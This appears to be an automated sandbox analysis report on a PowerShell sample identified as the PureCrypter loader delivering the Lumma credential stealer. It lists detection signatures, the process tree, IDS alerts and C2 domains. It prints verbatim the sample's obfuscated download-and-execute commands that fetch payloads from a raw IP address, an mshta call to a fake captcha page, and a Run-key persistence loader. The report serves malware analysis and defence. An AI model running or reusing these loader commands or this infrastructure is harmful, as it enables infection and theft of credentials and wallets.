Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
00.ps1

Overview

General Information

Sample name:00.ps1
Analysis ID:1591695
MD5:8067bbe2706cbd02f6885c17c186e6cd
SHA1:2d8e307684b8b5f8a8a68d5892db6879eaa69b25
SHA256:44be296b2cbb2b21f81aa170020314425962a7e935678fbab1f4845e953aeecb
Tags:asyncratlummastealerps1user-zhuzhu0009
Infos:

Detection

PureCrypter, LummaC, LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Detected PureCrypter Trojan
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Tries to resolve many domain names, but no domain seems valid
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • powershell.exe (PID: 744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 1536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 6488 cmdline: "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 3276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegSvcs.exe (PID: 7256 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • powershell.exe (PID: 6528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegSvcs.exe (PID: 7296 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • powershell.exe (PID: 1644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegSvcs.exe (PID: 7328 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • svchost.exe (PID: 6416 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
PureCrypterAccording to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021The malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["curtainykeo.lat", "kickykiduz.lat", "bloodyswif.lat", "miniatureyu.lat", "finickypwk.lat", "leggelatez.lat", "shoefeatthe.lat", "washyceehsu.lat", "savorraiykj.lat"], "Build id": "atxOT1--traff12"}
SourceRuleDescriptionAuthorStrings
0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000C.00000002.3294615870.0000000002CF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: powershell.exe PID: 3276JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 6528JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: powershell.exe PID: 1644JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_3276.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_6528.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi64_1644.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html, CommandLine: "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 744, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html, ProcessId: 6488, ProcessName: mshta.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6488, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X , ProcessId: 3276, ProcessName: powershell.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", ProcessId: 744, ProcessName: powershell.exe
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: mshta vbscript:close(CreateObject("WScript.Shell").Run("powershell $L='(New-Object Net.We';$Y='bClient).Downlo';$V='adString(''http://92.255.57.112/1/2.png'')';$F=I`E`X ($L,$Y,$V -Join '')|I`E`X",0)), EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 7256, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\(Default)
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1", ProcessId: 744, ProcessName: powershell.exe
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6416, ProcessName: svchost.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:09:12.652233+010020283713Unknown Traffic192.168.2.549711104.102.49.254443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:09:18.345633+010020355951Domain Observed Used for C2 Detected92.255.57.11256001192.168.2.549714TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:09:11.848853+010020591891Domain Observed Used for C2 Detected192.168.2.5578531.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:09:11.832910+010020592211Domain Observed Used for C2 Detected192.168.2.5503831.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:09:11.980268+010020591911Domain Observed Used for C2 Detected192.168.2.5580901.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:09:11.913322+010020591991Domain Observed Used for C2 Detected192.168.2.5631011.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:09:11.887607+010020592011Domain Observed Used for C2 Detected192.168.2.5647551.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:09:11.898821+010020592031Domain Observed Used for C2 Detected192.168.2.5579741.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:09:11.932328+010020592071Domain Observed Used for C2 Detected192.168.2.5587201.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:09:11.948087+010020592091Domain Observed Used for C2 Detected192.168.2.5645291.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:09:11.867321+010020592111Domain Observed Used for C2 Detected192.168.2.5567341.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-15T10:09:13.234585+010028586661Domain Observed Used for C2 Detected192.168.2.549711104.102.49.254443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://92.255.57.112/1/3.pngAvira URL Cloud: Label: malware
                  Source: curtainykeo.latAvira URL Cloud: Label: malware
                  Source: http://92.255.57.112/1/2.pngAvira URL Cloud: Label: malware
                  Source: https://view-reserve.com/recaptcha-verify.html...Avira URL Cloud: Label: malware
                  Source: https://view-reserve.com/recaptcha-verify.htmlAvira URL Cloud: Label: malware
                  Source: http://92.255.57.112/1/1.pngAvira URL Cloud: Label: malware
                  Source: 13.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["curtainykeo.lat", "kickykiduz.lat", "bloodyswif.lat", "miniatureyu.lat", "finickypwk.lat", "leggelatez.lat", "shoefeatthe.lat", "washyceehsu.lat", "savorraiykj.lat"], "Build id": "atxOT1--traff12"}
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: finickypwk.lat
                  Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: shoefeatthe.lat
                  Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: savorraiykj.lat
                  Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: kickykiduz.lat
                  Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: miniatureyu.lat
                  Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: leggelatez.lat
                  Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: washyceehsu.lat
                  Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bloodyswif.lat
                  Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: curtainykeo.lat
                  Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                  Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                  Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                  Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                  Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                  Source: 0000000D.00000002.2147918927.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: atxOT1--traff12
                  Source: unknownHTTPS traffic detected: 92.255.57.120:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49711 version: TLS 1.2
                  Source: Binary string: \??\C:\Windows\dll\System.Core.pdb_ source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: n.pdb source: powershell.exe, 00000007.00000002.2407828166.0000022DFF6E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2403046872.000001D0F0F15000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdbT source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbesv source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb1 source: powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbessA source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbK source: powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: #.dll.pdb source: powershell.exe, 00000005.00000002.2129677364.0000024B803CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2321469926.0000024BF74D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D803CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D0803CA000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbq source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2400988982.0000022DFF0BE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdban0K source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb?"#v source: powershell.exe, 00000008.00000002.2403046872.000001D0F0F15000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbX source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.2403046872.000001D0F0F15000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbV source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0BE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Core.pdbb\ source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32h source: powershell.exe, 00000007.00000002.2400988982.0000022DFF04E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2331698058.0000024BF7BA6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2407828166.0000022DFF682000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbSt^K source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Core.pdbE source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdblA source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C22000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2324263951.0000024BF7971000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000008.00000002.2403046872.000001D0F0EE0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2331698058.0000024BF7BA6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2407828166.0000022DFF6E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2407828166.0000022DFF682000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2403046872.000001D0F0EE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2403046872.000001D0F0F15000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbl source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0BE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb- source: powershell.exe, 00000007.00000002.2407828166.0000022DFF693000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb#{& source: powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 00000007.00000002.2407828166.0000022DFF693000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbS{ source: powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb( source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbO source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0BE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2407828166.0000022DFF6E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb?{ source: powershell.exe, 00000007.00000002.2400988982.0000022DFF04E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \SharpHide-master\SharpHide\obj\Debug\SharpHide.pdb source: powershell.exe, 00000005.00000002.2129677364.0000024B803CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B804A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2123644838.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2407828166.0000022DFF682000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2403046872.000001D0F0EE0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb` source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdb5 source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0EE000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 01950C18h11_2_019509FA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov esi, edx13_2_00408740
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h13_2_00429871
